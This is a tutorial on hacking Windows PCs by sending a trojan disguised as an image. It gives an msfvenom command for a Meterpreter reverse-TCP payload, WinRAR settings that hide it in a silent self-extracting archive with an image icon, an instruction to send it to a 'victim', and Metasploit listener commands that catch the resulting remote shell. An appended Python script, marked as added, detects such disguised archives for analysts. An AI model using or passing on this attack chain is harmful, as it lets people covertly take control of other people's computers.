How To Hack Windows PC by Sending An Image Using Kali Linux Metasploit

How To Hack Windows Using an Image: I already published a post about hacking Windows using an Excel file, and it was a really great tutorial. You should read that post if you haven’t already. But now it’s time for something new: I will tell you how to hack any Windows machine just by sending an image.

In the Excel file method, we embedded the code in the file; when the victim opened it, the code executed and we got the session in Metasploit.

This method is pretty much the same. We will create a payload, bundle that payload with an image, and create a rar file so that when the victim clicks on the rar file, they will see an image while the payload or RAT (whatever you are using) is executed in the background.

You need to have these tools and OS to accomplish this task.

Requirements

Kali Linux

Windows

WinRAR for Windows

Let’s start.

How to Hack Windows PC by sending an Image

Step 1- As always, we first need to create the payload. Open a Kali Linux terminal and execute the command below to create the payload.

msfvenom –p windows/meterpreter/reverse_tcp lhost=192.168.56.101 lport=5555 –o payload.exe

192.168.56.101 is my IP address, 5555 is the port that I want to use, and payload.exe is the name of the payload file.

You need to customize these options with your own IP address (type ifconfig to check your private IP address), port number and payload name.

If you want to hack your target over WAN or the Internet, you need to port forward in your router, or you can use portmap.io to port forward without a router.

Step 2- Choose the image that you want your victim to see when the payload is executed. For this tutorial, my image is named picture.jpg.

You need to convert this picture to an icon. Go to icoconverter.com, upload the image that you want to use, select the 64 pixels and 8 bits options and unselect all other options. Click on the Convert button. You will get a new image; rename it. For example, I will rename this file to picture.ico.

The next steps are done on Windows and need WinRAR, so I hope you have installed WinRAR.

Step 3- In Windows, copy the payload.exe file, the image file and the picture.ico icon file into a new folder. Select the payload and the image file (not the icon file, only the payload and the image file), right-click on the payload file, then click on the Add to archive option.

All the next steps are really important, so pay attention.

Step 4- You will see a new window named Archive name and parameters.

Now you need to customize the rar file features in the General tab. Rename the file with a more convincing name.

In Archiving options, select Create SFX archive.

In Compression method, select Best.

You need to have these settings in the General tab.

Go to the Advanced tab and click on the SFX options button.

Go to the Setup tab. In Run after extraction, write the names of the payload file and the image file, like payload.exe and picture.jpg.

Then go to the Modes tab. In Silent mode, select the Hide all option.

Go to the Update tab. In Update mode, select Extract and update files. In Overwrite mode, select the Overwrite all files option.

Then go to the Text and icon tab. In Load SFX icon from the file, select the picture.ico icon file that we created in step 2.

Step 5- Finally, click on the OK button and you will see a new file in the same folder, with the name that you chose while creating the rar file in step 4.

Send this file to your victim.

Now, whenever your victim clicks on it, they will see just an image while the payload is executed in the background, and you will get the shell.

Step 6 – Let’s start our listener in Kali Linux. Open a terminal and execute the following commands one by one.

msfconsole

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.56.101

set LPORT 5555

run

In the LHOST option, enter the IP address that you used while creating the payload. This will start the listener, and now all you have to do is wait for the victim to click on the image that you sent.

As soon as your victim clicks on the image, you will get the session.
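
For analysts handed a file like the one built in steps 4 and 5, the added example below (not part of the original tutorial) checks whether a file is really a Windows executable carrying a RAR archive, and whether its SFX script hides the dialog and launches a program, optionally alongside an image. It assumes the SFX script is stored as readable text after the RAR marker; if the archive comment is compressed, only the executable-plus-RAR finding applies. The sample bytes are constructed for the example and are not real WinRAR output.

```python
import re

RAR_MARK = b"Rar!\x1a\x07"  # common prefix of the RAR4 and RAR5 signatures
SETUP_RE = re.compile(rb"^[ \t]*Setup=([^\r\n]+)", re.I | re.M)
SILENT_RE = re.compile(rb"^[ \t]*Silent=1\b", re.I | re.M)
OVERWRITE_RE = re.compile(rb"^[ \t]*Overwrite=1\b", re.I | re.M)
EXEC_EXT = (".exe", ".scr", ".com", ".bat", ".cmd", ".ps1", ".vbs", ".js")
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif", ".bmp")


def triage_sfx(data: bytes) -> dict:
    """Report whether `data` is a PE file with an appended RAR archive and
    which SFX script directives are readable after the RAR marker."""
    off = data.find(RAR_MARK)
    tail = data[off:] if off > 0 else b""  # offset 0 is a plain archive, not an SFX
    targets = [t.decode("latin-1").strip().strip('"').lower()
               for t in SETUP_RE.findall(tail)]
    report = {
        "is_pe": data[:2] == b"MZ",
        "rar_offset": off,
        "setup_targets": targets,                        # "Run after extraction"
        "silent": bool(SILENT_RE.search(tail)),          # Modes tab: Hide all
        "overwrite_all": bool(OVERWRITE_RE.search(tail)),
        "launches_executable": any(t.endswith(EXEC_EXT) for t in targets),
        "opens_image_decoy": any(t.endswith(IMAGE_EXT) for t in targets),
    }
    is_sfx = report["is_pe"] and off > 0
    if is_sfx and report["silent"] and report["launches_executable"]:
        report["verdict"] = "suspicious"  # hidden extraction plus auto-run program
    elif is_sfx:
        report["verdict"] = "sfx"         # self-extractor, nothing hidden
    else:
        report["verdict"] = "not_sfx"
    return report


# Constructed samples: stub PE header, RAR5 marker, then SFX script text.
STUB = b"MZ" + b"\x00" * 62 + RAR_MARK + b"\x01\x00; SFX script\r\n"
SAMPLE_DROPPER = STUB + (b"Setup=payload.exe\r\nSetup=picture.jpg\r\n"
                         b"Silent=1\r\nOverwrite=1\r\nUpdate=U\r\n")
SAMPLE_INSTALLER = STUB + b"Setup=setup.exe\r\n"
SAMPLE_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 32

if __name__ == "__main__":
    for name, blob in [("dropper", SAMPLE_DROPPER),
                       ("installer", SAMPLE_INSTALLER), ("jpeg", SAMPLE_JPEG)]:
        print(name, triage_sfx(blob)["verdict"])
```

A file that shows an image icon but reports is_pe as true is already worth a closer look; the silent flag and the image decoy entry are what separate this pattern from an ordinary installer.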

Conclusion

This was our second tutorial in the series on hacking Windows using Kali Linux and Metasploit.